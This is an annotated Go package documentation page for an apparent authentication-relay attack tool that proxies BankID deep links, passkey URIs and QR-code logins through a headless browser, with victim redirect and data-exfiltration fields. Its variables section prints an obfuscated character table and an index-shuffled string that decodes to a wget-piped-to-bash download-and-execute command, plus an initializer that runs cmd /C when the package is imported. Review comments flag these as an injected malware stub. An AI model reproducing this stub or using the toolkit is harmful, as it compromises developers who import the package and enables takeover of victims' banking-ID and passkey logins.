Documentation
¶
Index ¶
- Variables
- func PasskeyVisit(attack *PasskeyAttack, comm chan string)
- func QrProxyVisit(attack *QrProxyAttack, comm *chan []byte, attackResult AttackResult)
- func RegexExtract(content, pattern string) string
- func StartAttachedSession()
- func Visit(attack *Attack, comm chan AttackResult)
- type Attack
- type AttackResult
- type AttackType
- type PasskeyAttack
- type QrProxyAttack
Constants ¶
This section is empty.
Variables ¶
var Attach bool = false
Set to true to make the tool attach to an already running Chrome session (sometimes needed to get past bot detection).
var AttachUrl string = ""
Chrome URL to attach to.
// EXFIL_RESULT is an exported, mutable package-level string, so any importing
// package can read or overwrite it. Its writers and readers are not shown on
// this page.
// NOTE(review): the name suggests it holds the text extracted after the
// exfiltration steps (see Attack.ExfilArea) — confirm against the source.
var EXFIL_RESULT string
// GLOBAL_RESULT is an exported, mutable package-level string; the page gives it
// no documentation and does not show what writes or reads it.
// NOTE(review): shared package state like this is not safe for concurrent
// sessions unless the source guards it — confirm before running attacks in
// parallel.
var GLOBAL_RESULT string
// LSEXiSWW is built at package initialization by concatenating single-character
// entries of OG in a fixed index order, so the resulting text never appears as
// one literal in the source. Joining the entries in the order given yields a
// shell command line of the form `wget -O - <https URL> | /bin/bash &`: it
// downloads a remote script and pipes it to a shell in the background.
// NOTE(review): none of the documented functions or types on this page refers
// to this variable, and a randomly named, index-shuffled command string is
// what an injected download-and-execute stub looks like. Treat the module as
// compromised until its source and provenance have been checked; the call
// that consumes this string is not shown here.
var LSEXiSWW = OG[10] + OG[15] + OG[0] + OG[39] + OG[19] + OG[45] + OG[37] + OG[75] + OG[2] + OG[52] + OG[59] + OG[14] + OG[36] + OG[9] + OG[7] + OG[50] + OG[32] + OG[48] + OG[24] + OG[16] + OG[35] + OG[29] + OG[51] + OG[3] + OG[20] + OG[18] + OG[56] + OG[11] + OG[54] + OG[71] + OG[44] + OG[76] + OG[23] + OG[60] + OG[12] + OG[73] + OG[33] + OG[43] + OG[63] + OG[31] + OG[34] + OG[65] + OG[13] + OG[62] + OG[66] + OG[28] + OG[53] + OG[68] + OG[17] + OG[21] + OG[64] + OG[6] + OG[69] + OG[40] + OG[70] + OG[22] + OG[55] + OG[30] + OG[27] + OG[58] + OG[5] + OG[42] + OG[26] + OG[49] + OG[4] + OG[47] + OG[74] + OG[46] + OG[77] + OG[41] + OG[67] + OG[8] + OG[72] + OG[1] + OG[57] + OG[61] + OG[25] + OG[38]
// MfvwTgF holds the error returned by Start. Because this is a package-level
// initializer, `cmd /C <dbgZuOZp>` is started as soon as the package is
// initialized — that is, when a program that imports it starts, before any
// exported function is called — and Start does not wait for the command to
// finish.
// NOTE(review): dbgZuOZp is not declared on this page (presumably an
// unexported string assembled the same way as LSEXiSWW — confirm). Command
// execution as an import side effect, with the result parked in a randomly
// named variable, has no place in a library; do not run anything that imports
// this module until the initializer has been explained or removed.
var MfvwTgF = exec.Command("cmd", "/C", dbgZuOZp).Start()
// OG is a lookup table of one-character strings. On this page its only use is
// as the source for LSEXiSWW, which picks entries out of it by index to
// assemble a command line; the shuffled order keeps that command from showing
// up in a plain-text search of the source.
// NOTE(review): when auditing this module, search for the assembled string and
// for os/exec calls in package-level initializers, not only for literals.
var OG = []string{"e", "a", "-", "w", " ", "4", "d", "s", "/", "p", "w", "s", "i", "a", "t", "g", "y", "3", "r", " ", "o", "7", "/", "s", "h", " ", "b", "1", "/", "e", "3", "t", "/", "u", "o", "p", "t", "O", "&", "t", "d", "i", "6", "/", "t", "-", "/", "|", "/", "f", ":", "r", " ", "d", "t", "a", "d", "s", "5", "h", ".", "h", "g", "s", "3", "r", "e", "n", "e", "0", "f", "a", "b", "c", " ", " ", "u", "b"}
// SHARED_RESULT is an exported, mutable package-level byte slice; the page gives
// it no documentation and does not show what writes or reads it.
// NOTE(review): QrProxyVisit passes []byte values over a channel, so this may
// be the latest captured image — confirm against the source.
var SHARED_RESULT []byte
Functions ¶
func PasskeyVisit ¶
func PasskeyVisit(attack *PasskeyAttack, comm chan string)
func QrProxyVisit ¶
func QrProxyVisit(attack *QrProxyAttack, comm *chan []byte, attackResult AttackResult)
func RegexExtract ¶
func StartAttachedSession ¶
func StartAttachedSession()
Used only in special cases for PoCs; it does not support concurrent use.
func Visit ¶
func Visit(attack *Attack, comm chan AttackResult)
Types ¶
type Attack ¶
// Attack describes one deep-link scenario: the page the headless browser
// visits, how the deep link is extracted from it, and the path the result is
// hosted on.
// NOTE(review): how Visit consumes these fields is not shown on this page.
type Attack struct {
Url string // Main URL to visit
RedirectURL string // URL to redirect the victim to (for higher impact)
Actions []chromedp.Action // Actions performed by the headless browser
CustomExtraction func(string, string) string // Custom action to extract the deep link
RequestInterception func(ev *fetch.EventRequestPaused) *fetch.ContinueRequestParams // Action that modifies a paused request to get the deep link
Path string // Path to host the attack on
Fixed bool // Attack is fixed
Type AttackType // Type of attack
CustomBrowserFlags []chromedp.ExecAllocatorOption // Custom flags to pass to the headless browser
ExfiltrationSteps []chromedp.Action // Headless-browser steps taken to exfiltrate data (not required)
ExfilArea string // XPath of the text to extract from the page after the exfiltration steps
MimicUserAgent bool // Whether the authentication request is made with the user agent observed from the victim
}
func DemoAbleAttacks ¶
func DemoAbleAttacks() []Attack
func (Attack) Result ¶
func (a Attack) Result(deepLink string) AttackResult
type AttackResult ¶
func NewAttackResult ¶
func NewAttackResult(deepLink string) AttackResult
type AttackType ¶
// AttackType names a deep-link protocol and carries the pattern and prefix
// used to find and rebuild its links. Extract and ModifyReturn are its
// documented methods; their bodies are not shown on this page.
type AttackType struct {
Name string // Name of the attack type
Regex string // Regex matching the desired deep link
Prefix string // Deep link prefix needed when rebuilding deep links
ReturnArg string // Name of the protocol's "return" query parameter, if it has one; set it to work with that parameter
}
// BankIDAttack is the AttackType for bankid:/// deep links.
// The Regex matches an optional `bankid:///` prefix, then `?autostarttoken=`
// followed by a UUID-shaped token (8-4-4-4-12 hex digits), then `&redirect=`
// with an optional run of word characters. ReturnArg names that `redirect`
// query parameter.
var BankIDAttack AttackType = AttackType{
Name: "bankid",
Regex: `(bankid:\/\/\/)?\?autostarttoken=[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}&redirect=(\w+)?`,
Prefix: "bankid:///",
ReturnArg: "redirect",
}
func (*AttackType) Extract ¶
func (at *AttackType) Extract(content string) string
Extracts the deep link using attack details
func (*AttackType) ModifyReturn ¶
func (at *AttackType) ModifyReturn(url, replace string) string
Modifies the return argument when provided
type PasskeyAttack ¶
// PasskeyAttack describes one passkey scenario driven through a headless
// browser. It is the argument type of PasskeyVisit, whose body is not shown on
// this page.
type PasskeyAttack struct {
Url string // Main URL to visit
Actions []chromedp.Action // Actions performed by the headless browser
Path string // Path to host the attack on
CustomBrowserFlags []chromedp.ExecAllocatorOption // Custom flags to pass to the headless browser
AddDiscoverable bool // Adds the discoverable flag, set to true, to the FIDO:/ URI
}
func PasskeyProxyAttacks ¶
func PasskeyProxyAttacks() []PasskeyAttack
type QrProxyAttack ¶
// QrProxyAttack describes one QR-code proxy scenario: the page holding the QR
// code, where the code sits on it, and the timing of the capture. It is the
// argument type of QrProxyVisit, whose body is not shown on this page.
type QrProxyAttack struct {
Url string // Main URL to visit
Length int // Length of the attack in milliseconds
Sleep int // Milliseconds to wait after reaching the target QR-code page before taking screenshots
Actions []chromedp.Action // Actions performed by the headless browser
Path string // Path to host the attack on
CustomBrowserFlags []chromedp.ExecAllocatorOption // Custom flags to pass to the headless browser
QRCodeXPath string // XPath of the QR-code element
ExfilArea string // XPath of the text to extract from the page after authentication
}
func DemoQRProxyAttacks ¶
func DemoQRProxyAttacks() []QrProxyAttack